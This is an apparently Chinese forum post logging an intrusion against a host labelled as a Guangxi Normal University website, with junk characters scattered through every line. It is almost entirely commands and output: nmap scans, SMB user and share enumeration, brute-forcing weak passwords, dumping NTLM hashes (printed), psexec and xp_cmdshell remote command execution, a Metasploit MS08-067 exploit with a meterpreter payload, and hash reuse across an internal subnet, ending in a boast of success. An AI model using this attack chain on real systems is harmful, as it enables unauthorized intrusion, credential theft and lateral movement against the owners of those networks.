广西师范网站http://202.103.242.241/
3 Y8 }' o( u$ I1 z' b& _
) N$ i" V% O" p4 ]" ?* W9 Proot@bt:~# nmap -sS -sV 202.103.242.2410 {+ x2 C. m, f# L' L
0 C4 ~$ }- E, S; k+ M+ m) iStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
' j7 I- B# e8 q1 Y0 S8 j [& b8 s# z0 [0 G, I4 y+ ~) m
Nmap scan report for bogon (202.103.242.241)
, `/ K* V9 T" O9 g3 r$ R! {" }3 d/ D% _ `7 R9 L
Host is up (0.00048s latency).
# C9 R* X; R F* K R' C. Q( u1 }0 \0 n) L2 N9 f9 }
Not shown: 993 closed ports
' _* D, }. y+ [; m* f, @$ S0 @/ c7 x7 t4 s& t- U
PORT STATE SERVICE VERSION
. o+ ^" [% ]" O! F4 s. l" M0 n8 W. D8 b2 R! b' {/ e
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)+ k( r3 G: c8 j1 d6 G8 e
2 R( ]: Y- R, @7 N
139/tcp open netbios-ssn
; Y E: W7 N0 [3 h1 R( t, |5 G6 D3 r+ Z9 w
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds4 K: N- x4 n+ N
3 h2 O+ [2 n& {# c( j
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
& ~6 k; }( b' C6 {
0 h$ v) J8 ~ Z) l1 O J# [1026/tcp open msrpc Microsoft Windows RPC y% {$ |! I" M+ R
' O; l# C$ \# x/ M B# V) E3372/tcp open msdtc?
/ b+ Z3 I' b8 S( J. @: x( e" @3 N
3389/tcp open ms-term-serv?' U3 A7 y/ w# I' k
6 G2 y6 g/ Z5 L* x! P: `/ T
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
1 T0 X; K9 K, ^+ v3 z RSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r& x1 }. W5 t; z% y- _+ [6 E
1 x3 Z: l/ o+ r6 d
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions5 f( f9 ?2 r/ ]: {1 C
& W$ ? ?% s4 D8 Z) L8 mSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
) i7 u) Q1 ]6 e2 [/ I
% q1 V) t# v q: j9 k# N7 WSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO) m2 H5 @- m+ A- r- x7 G
q8 r* i3 u' V. ^6 h
SF:ptions,6,”hO\n\x000Z”);
; W: Z' v( Y6 v" Z1 k. u
" m5 s3 [3 y- T, NMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& m1 j/ v2 V6 W
/ G% C+ S5 b& y! `" V* f, K* l3 q) ZService Info: OS: Windows3 H5 x. B d# P6 L4 P
! }, u8 q2 x4 @+ `* TService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
0 c7 a1 U G6 e$ k
) a! |; R8 D" |8 v1 f' c3 _' eNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
" r; x+ ^: F1 {% w. N) |+ `) R, ^$ j: p: I, S2 n1 G, x! J+ ?: P
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本3 ~6 ^) c1 f; A, T; A* F% S
# z& x# m- {3 o6 t% S
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse( K) M; m0 H$ a1 Q& m4 v
$ |% a9 a& K: ]2 k9 ^# j% j-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse0 s# w9 t, I6 b! ?4 u+ ]
9 O, l( E9 B- v( r7 w6 _
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
/ F$ y6 y* G" ?. \1 `/ h. e5 i, L
! H6 Z* ]/ E, n! G-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse( v/ t7 F3 {$ j( c
$ D& `, j/ p1 G/ b% R2 s-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse. m. r X8 u6 c! [, b% y5 d$ e
9 C" _, T/ m5 q0 S
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse* b* F, h% i- i: z% `
& d: y1 `* k8 o. E* ^1 H-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
4 Y5 \) S( x* z- x6 r/ [
/ u7 W8 l% C% @( _: A' F% v6 v7 g-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse9 c+ U3 U4 s. h" \
; H$ e7 t4 J& V" u1 `: C' Y+ H0 l-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
- o' a2 ~+ I: y$ W( M' Y3 @+ [6 _4 _0 g
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
7 l/ {& b4 Q& i9 c1 s! ?( g
J$ O: Q& O2 Q& J-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
3 N! L# h5 Y8 E# F+ W3 Z* }! W* G% E: d6 s* P! F, `" P! w; [
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse1 W/ q5 ^/ X, L& {( E; z
+ m4 h/ ]) h2 D
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
5 ^6 i/ h# j" ]/ M( n0 F# Z
1 E+ A: p5 ]! R2 R$ v-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
. Q# S( A0 @$ T
8 M" D$ D8 ^" O+ V" L' {-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse3 `. s' @5 g+ s3 P
) @, v5 T+ D2 L: C
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
) z+ D+ |% l( U' F
# k0 X% F7 D O5 d2 Y0 ~8 [) ~//此乃使用脚本扫描远程机器所存在的账户名' b4 m, M+ b+ L% l
: ~. l' ]/ {+ O! r, k4 ^$ c$ I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST+ h5 ?5 K4 r3 `2 }% ~8 S. ~7 H; r+ R' O
; ]1 N0 ?* s2 ]) `) e$ o- {Nmap scan report for bogon (202.103.242.241)+ V5 [; E* ~0 ~# h' l
3 \6 {% Y, x' DHost is up (0.00038s latency).
, W6 ~9 B8 [6 [1 I* U
% ]! ?( t2 [" oNot shown: 993 closed ports9 n6 Y( M; H* r3 O# H4 i
6 N1 g& C2 r5 I8 ]$ B. V; oPORT STATE SERVICE1 `; @- s6 X- T* v3 C. w) D3 M
4 k v; L% k! Y4 d135/tcp open msrpc- ^) ?) {0 R3 x# {' ~1 @. R! U( K( r/ F
& K0 P' r( U4 }1 H139/tcp open netbios-ssn1 R% ]0 j" a& Q* [4 Y6 H
9 O2 C: N' R' c! u- E7 a$ B445/tcp open microsoft-ds
; F: ]- P4 |! h; s& L+ W4 I+ H) p# d; `, a* u) f
1025/tcp open NFS-or-IIS
3 x- }9 I$ Q3 {4 y
1 ~* t$ x1 i% S/ z1026/tcp open LSA-or-nterm _5 y0 `: w+ B' n
& |# F/ ~) A* Q4 L8 ]3372/tcp open msdtc2 U0 M' [5 M9 O; I0 j
X+ [$ C- m; F( L7 X3 U; j; I2 H
3389/tcp open ms-term-serv
3 x3 b) `: ], W* g- @4 e4 v$ w
5 Z, N6 Z# X9 G) a5 K9 l7 f; hMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
+ ?! i1 R1 e6 v ]# Y
7 Q* t. Z+ G7 s, D+ BHost script results:- J) |2 r) W$ P8 w8 J
1 b: q6 G7 U* x
| smb-enum-users:( ]6 p* O, s* F' s1 g
. D) {- z2 i5 I* p- U; H) q
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果0 m: Z, e+ f1 h/ C
, Z$ i0 Q7 z% o# O1 D$ a
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds7 @# C R. \7 {+ E9 m" q
* ?- y6 P, ~# b/ {root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
0 R2 M& I$ s% y) j, S* @+ m4 T# z# s6 @+ K$ t( w7 P+ a
//查看共享$ _/ b. G* F" E7 i: J; ]
) i9 ?' J3 s" f
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
# z' f' J, }' E$ p4 a/ c! @/ ?1 r: E- y* k. X# V5 T: ]/ Z6 Y. Q
Nmap scan report for bogon (202.103.242.241)
% K* M) v( x& ^ P1 b+ t( }+ @7 C* c3 W
Host is up (0.00035s latency).4 V7 R& I, q" n
$ G: M( U, [4 ^* [# n, C; yNot shown: 993 closed ports
9 n$ y9 p" f7 y7 [
& b5 Z& O/ ]' tPORT STATE SERVICE1 t* H# i* X9 `8 W- U. k: d6 o4 D
# X0 h1 ~: u% @: [& n4 F
135/tcp open msrpc
2 H6 r5 a2 z$ T: W- K* B5 V7 I( V7 B/ n f. L( m( @; Y
139/tcp open netbios-ssn
" T3 s1 ^4 s: u/ [
) Y* R9 y7 [2 W1 J6 b2 j* F445/tcp open microsoft-ds- K' I$ f6 u" v. U
/ i1 ?4 C; o& K0 z _7 o1025/tcp open NFS-or-IIS% ^* Z8 B1 M& v+ e0 S9 A2 Z
- w* J9 i0 {& Z5 a' t3 U# U
1026/tcp open LSA-or-nterm Z8 i4 e% H3 F" E' H4 G1 n9 a
2 d z; |$ @ y5 G/ z3372/tcp open msdtc
1 o$ [' x; z4 v( |' [8 Y. N T7 z+ O3 a- Y2 B- f; z6 D7 n
3389/tcp open ms-term-serv
! c& T! |+ ^. @7 _- j* B! }% E( }# d+ E. H5 O+ g; u6 J3 F4 p
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)+ w l& I+ [! E2 ?3 P( j5 L Q
1 Q: A5 }' D6 \' ^1 i: LHost script results:
! }4 N4 g# ^$ X3 L7 m" `2 k7 n; p
s4 [4 p/ O, m7 Y) F| smb-enum-shares:
5 W& {. f* U5 O! z% g! Q/ U( Y8 l# l/ `' }- [& U8 X; H
| ADMIN$
8 J2 ?, F9 y6 n: j2 t
) `6 x! M. G K* N1 M* G- y9 D| Anonymous access: <none>- H, k6 v# T7 }
5 N5 T* l5 C; @% N8 h {| C$
g* t8 b3 _1 i* {6 U1 Y4 k8 M! B7 p& o8 y; r" M
| Anonymous access: <none>
& L- f; M- ]5 m" [1 K1 T+ m% t/ U7 C
| IPC$
* i6 I7 x5 N( I" o) p- ]( A/ r4 F
|_ Anonymous access: READ( R$ X- T/ Y6 d8 v1 z. F
$ [% b+ g$ c! `* z- a$ ]
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds' V" x/ k3 F% }% F5 q
4 l7 `0 T# i: Q5 M N& J$ H- ?. M K8 xroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 6 Q- ?4 E0 c& h
$ K& {) ^$ j$ s5 I% o1 J
//获取用户密码8 ]: ^! O2 @+ I) m% X
: L- q6 C! k' f) e2 N
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
5 D% h5 k$ @7 G1 K! y t; k' T6 x" t6 [6 \+ G
Nmap scan report for bogon (202.103.242.2418)
; K" F: ]2 E+ s1 a9 H" f/ J
! A+ r- G! [2 Y' B7 @: RHost is up (0.00041s latency).( C y( |7 N% ~
4 f% ?& d& M5 ~( y3 T! ?Not shown: 993 closed ports) G( } x, o) `& N6 W
u8 S9 S8 a- M1 QPORT STATE SERVICE; F% \, ]0 R$ g( {4 s) p
0 z/ }4 |0 ?! e# `+ s2 g
135/tcp open msrpc K$ P! E9 t* A; l5 Z% J3 ~9 [5 T+ L& d
6 v+ S0 s. Q9 Q) n
139/tcp open netbios-ssn0 V. h. q1 Q7 e, P0 Y, N1 @
- B- X( ^% \) i. C5 D" F
445/tcp open microsoft-ds( S- U* f' u5 a4 `' L, R& S: c
?5 p+ |: Q8 u6 L1025/tcp open NFS-or-IIS
p2 \1 I) P( j, Y" x8 S5 D
/ h, P8 m# d4 N9 @ O- R6 t3 Z2 O1026/tcp open LSA-or-nterm) ~) \# t9 a, u
* W% w( _: ^+ g, @' U! z- }6 T3372/tcp open msdtc
1 f5 R( x, X/ h0 w8 P) R. H$ T+ ?8 E! }' [1 b- K4 `, S8 |& D$ ~
3389/tcp open ms-term-serv3 ^% k, m, F& r% R6 \: T: z8 a$ S
+ M- u) y6 I6 g6 U C
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 w T9 @( s: P6 [
i+ ]) w( y4 F! q+ B$ W0 d! d9 T/ {
Host script results:
9 `. }6 q- j" [ h2 f
4 g# S4 b* k+ B2 R# ^3 z| smb-brute:
% m8 m* R4 Z+ z
- k J0 j" L& Q( kadministrator:<blank> => Login was successful" c. K" T! V9 k: n! M
# `0 ~( \# _' {' K- m4 P|_ test:123456 => Login was successful1 N7 Y" |- [/ N7 h+ i2 }
) k% A$ f8 e: FNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
2 c# E a8 a* _9 g+ R
) J+ S: F, y6 t# R4 e6 b- c3 e1 sroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash6 l. {$ X V3 ~" C0 @
! u5 m4 ~9 H2 {) i% V* p! I: zroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data# k* a* b; p/ u0 s8 ~! F, L
8 B+ ?9 g8 `6 X5 d4 a; ]root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse' y! r4 E) P$ H9 D b. M
+ [- `/ c! w8 L2 U5 Yroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139" W! }6 Y! G# F! v$ ]% f$ ?
& k6 l9 x$ F! K1 YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
. D* o7 N9 o4 d* G# r4 G6 f+ m' f0 g) k9 q4 ?
Nmap scan report for bogon (202.103.242.241)
- l* ^& l/ }# m# a2 k5 ]& }$ c! C5 N3 Z3 y3 {4 p, I
Host is up (0.0012s latency).- [7 U6 s: C7 ^2 R% Y( s' l
2 x0 R. Y$ Z$ n( r2 C: y! t. P$ h6 ?
PORT STATE SERVICE
& m% x/ `8 D. {2 e8 k2 F6 i2 ?
: H4 R$ q8 F5 R( n/ a6 x# N135/tcp open msrpc e5 t) x: x: ~0 g
" p4 A4 G7 M' |# D1 K& m, b& {139/tcp open netbios-ssn, y% ^, `0 {' |4 }3 P, d
/ O/ w, b2 l X8 i% c+ S0 {445/tcp open microsoft-ds D$ R4 W+ t7 H
_ K$ [5 w, c$ d$ d: W+ TMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
! |: d% f; ~& y9 q. |
8 b5 Y6 C7 D: D4 ] s% I+ lHost script results:: ], Y% H2 t% c
' \. v F$ `$ u6 M1 c1 I: Q6 i' ]$ @7 I| smb-pwdump:
1 i6 w/ R9 l. W' ~2 b/ N# ?* Q# V$ X, U8 J7 K) K
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************# p& v! X- _: G( s9 ?0 o
$ p2 T* @8 e! C) J
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************. E5 ]! g6 P. C, H1 Z9 v
/ V; L0 @7 I$ B+ U5 @! d
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
8 r" ~& w; o' X) ?; H
" k6 v* k& ^7 g' p7 s( ?|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D20 M( v; U% ~6 p9 O) E2 A
& f- i$ U+ F z6 Y9 k0 pNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
$ U9 k# L4 ?6 A9 ^: M) ^7 }/ M* I0 y$ k% a
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
0 o1 B0 E8 i5 C3 j* I/ R- r+ }8 m( v% r
/ `1 U8 d s7 A" g% V: ?-p 123456 -e cmd.exe1 z0 y5 }* w4 a
5 x: _* m1 r" t3 A0 ^5 f/ W
PsExec v1.55 – Execute processes remotely# ~3 x4 k6 K2 Z- |- J# Q0 Z7 r: V
. [( ~2 a4 ~: Y" J! {) _
Copyright (C) 2001-2004 Mark Russinovich
# V0 i$ O- H/ y# J4 o% t! O3 o8 n) M5 Q) I$ D
Sysinternals – www.sysinternals.com
" o& E, U4 ?+ F0 D
* R0 c( B# l! n/ F8 EMicrosoft Windows 2000 [Version 5.00.2195]3 o, Y/ V0 X: y8 D, Q3 v( T6 A
1 _- k+ w" [! H(C) 版权所有 1985-2000 Microsoft Corp.3 m; r0 w4 j' ?9 T4 V! ?
9 O# |7 n z' A+ P; L
C:\WINNT\system32>ipconfig
7 x: n5 ?2 ~. \% G- K
+ ^# ]3 _$ C% `- Z8 J e5 \ gWindows 2000 IP Configuration2 \2 Q4 E' I- E3 h# f
6 ?3 ]/ j- k o/ E
Ethernet adapter 本地连接:
1 B0 T M2 \# `6 S# w# F p1 b2 l8 p, _/ Q! K+ V+ h+ [4 o
Connection-specific DNS Suffix . :
4 N$ D! u8 r9 @! @ s! R C3 ^$ H. o0 L) p! P7 I' s: H$ P3 \2 Y. Z
IP Address. . . . . . . . . . . . : 202.103.242.241. E" Z6 X9 J( k/ U! D+ V( H" F" s$ @
; U1 ]* T6 [' p
Subnet Mask . . . . . . . . . . . : 255.255.255.0
; E+ ?4 X6 N. q; T4 N3 ?2 X( a4 s" _
Default Gateway . . . . . . . . . : 202.103.1.18 |0 r8 X' M7 C- d( x6 q+ k
3 I% H: y5 |: Q" M0 ~4 ]6 x6 r! E
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
8 ?, s: ], [2 F: \, e
' ~2 M% f3 N4 ~# zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞. g& H! E* g' k. b2 [8 D0 ~
* ]0 U9 q, b$ H" g1 Z IStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
+ C" S d% P0 F# a! ] L; ]9 T* F
Nmap scan report for bogon (202.103.242.241)9 ]9 A( z* J, d. j3 U; F
. [8 M' m% X$ ]8 I+ U
Host is up (0.00046s latency)." u, x. u8 n9 R. \
! {9 y1 U" |6 l8 SNot shown: 993 closed ports
3 z. D0 h' F% I1 F; v+ V! e! Q4 d
PORT STATE SERVICE
" X3 S, ?1 C$ E& h v: X8 O! q, {* H
135/tcp open msrpc% J+ X8 ], `$ G+ H; b
$ B& }- G& _2 S, D/ ^2 B
139/tcp open netbios-ssn
: u- i7 `) @+ z: X3 Y/ a5 w9 _! {' A
445/tcp open microsoft-ds* r$ H4 h n9 E3 P
) l8 Y8 y0 U k0 H1 Z1025/tcp open NFS-or-IIS
* D: I1 d k' A% c% O, @& x+ h8 o; J
' Q9 `. P1 \6 F0 F' d7 ]5 Y1026/tcp open LSA-or-nterm8 U* I# z G# Z/ c& z8 e+ s
0 j& T$ l2 B @. \4 w* Z
3372/tcp open msdtc
) ]) C$ F( ?- B# L2 G- G- J' m+ B: ?5 m1 [
3389/tcp open ms-term-serv1 v. H0 O, D/ a/ h1 @% `
1 q8 f! u c6 [
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
9 T: d- a5 h% w* ]2 U- f' z3 T* ?4 _% p: m- T }7 c" L+ N
Host script results:3 R" k4 b- @. n* q; x6 k
+ c4 e. p7 ]' ~9 q
| smb-check-vulns:8 P8 j. A! i( s+ z5 m1 {
6 ?- I" _* t# e5 d
|_ MS08-067: VULNERABLE8 n+ O* @3 d7 z$ Y
: r7 h: H* b2 P) }8 ~
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds {6 {& N) w5 f6 N5 O" c. I/ j" ~2 x
4 k$ w z: \) F7 X! E4 X
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
; J! |" ~! R" k8 m7 P# A J# t; I
! j3 v6 l3 ?! c* ?! ?msf > search ms08# n6 w5 [8 R1 C/ T1 D( t
6 T9 X: z3 G# M3 emsf > use exploit/windows/smb/ms08_067_netapi- E0 v4 F+ ~4 g% R, `9 E
5 ]! ]5 n* z6 R+ ~( W' A5 [msf exploit(ms08_067_netapi) > show options
: E: K& p, V: Q7 v8 k: a
5 K( l* u2 I6 t5 Emsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241+ m- i0 a4 Y( E( g9 g2 o
2 B$ e0 l8 w. v/ X. T" g
msf exploit(ms08_067_netapi) > show payloads* _; \9 x8 r! J9 Z
2 z, r$ e5 o; B4 Y8 i8 \, |
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp; w( J) f; A5 V- c4 i1 [. W3 j
# { Z7 y1 q6 Y. D5 q: pmsf exploit(ms08_067_netapi) > exploit1 O9 ~1 ~: J4 s# s
" ^5 ?8 v4 E" J: H0 R& N4 s
meterpreter >
8 }+ K3 J( e* M8 H7 Z8 l5 b% q1 _1 q
( M w( ?2 G$ mBackground session 2? [y/N] (ctrl+z)
. f# O( i. {* b6 T8 G* C4 d- U$ s. M& H" t8 @8 i) a
msf exploit(ms08_067_netapi) > sessions -l% N3 ?/ V' u; I
" C* U, C# F2 h" Oroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt' | r' l, v* ~
- G: R" Q: i; B" ~% x9 _1 {3 |test
4 }8 H L9 s/ P3 l. A* W9 R: e
administrator3 O3 [3 A. R8 f1 E( ~
. O8 z, d) v/ r0 T. jroot@bt:/usr/local/share/nmap/scripts# vim password.txt8 n- c; ?4 @0 p5 I; R/ w! I
8 U: c+ e, m/ S% t+ D
44EFCE164AB921CAAAD3B435B51404EE: X6 {/ K. G3 j9 i3 D$ j# b; ^: }
+ q4 k0 G" o* A8 G0 o% Troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
# L* Z7 }1 O; j ]& d$ y) A& n- f8 Z7 P1 x
//利用用户名跟获取的hash尝试对整段内网进行登录
" [) e8 _7 {' Z7 \2 ?4 m# K* D$ Y! ?8 R6 @1 z
Nmap scan report for 192.168.1.105
. `' t+ V2 A# o; J2 q& `: h n
( ~9 A8 y! c; n5 r0 sHost is up (0.00088s latency).1 A# T) c( z+ e' A
! }- D$ s8 i7 T( K0 lNot shown: 993 closed ports
9 C- M- Z6 g) d7 `. o
# ?( M) r+ [0 |% z+ ]) dPORT STATE SERVICE
- `+ X8 m& d0 A6 u
8 @* s" L% e4 [4 c# w! D& @135/tcp open msrpc
7 l- |% _2 c! ^$ a1 C: D* K2 O
3 W5 a$ l# ?; K$ ]139/tcp open netbios-ssn. W$ C0 f) q5 o
* Q3 m3 J# `; H2 I: O$ P! G445/tcp open microsoft-ds" T- Z& ^. k. ^; q* Y4 c
, P) m1 [% T! P0 b) {
1025/tcp open NFS-or-IIS
; m- t0 n' E. b$ n( _. w$ E- E4 K8 S' i# N4 }6 V6 u& i
1026/tcp open LSA-or-nterm% b- u" n4 N. P& V7 Y
9 T8 u2 j- U: ^. ^+ ^
3372/tcp open msdtc
$ G9 v) s% B7 M" {* q
$ G h, k' }' a3 p+ M! [* \/ q8 y8 Z3389/tcp open ms-term-serv3 X, [2 i4 B, j' @/ C4 m# A
8 ^0 K8 Q: w. hMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
; O( d, E1 T3 X8 ?/ |; Y
1 S9 V4 Q, I8 p$ DHost script results:# g8 \' g' ^" N( q5 Y
, |5 c: N( J( h9 b1 d
| smb-brute:
9 S/ u7 Q3 n; w7 a( n4 U. l/ }1 h9 }1 a: R) L2 v
|_ administrator:<blank> => Login was successful
% \2 A7 u K$ ]- R5 P! p b, n" H2 i5 M. f# {
攻击成功,一个简单的msf+nmap攻击~~·4 W5 X( w7 y/ Q' N: M' m) l
; d* x' ]+ B5 X
|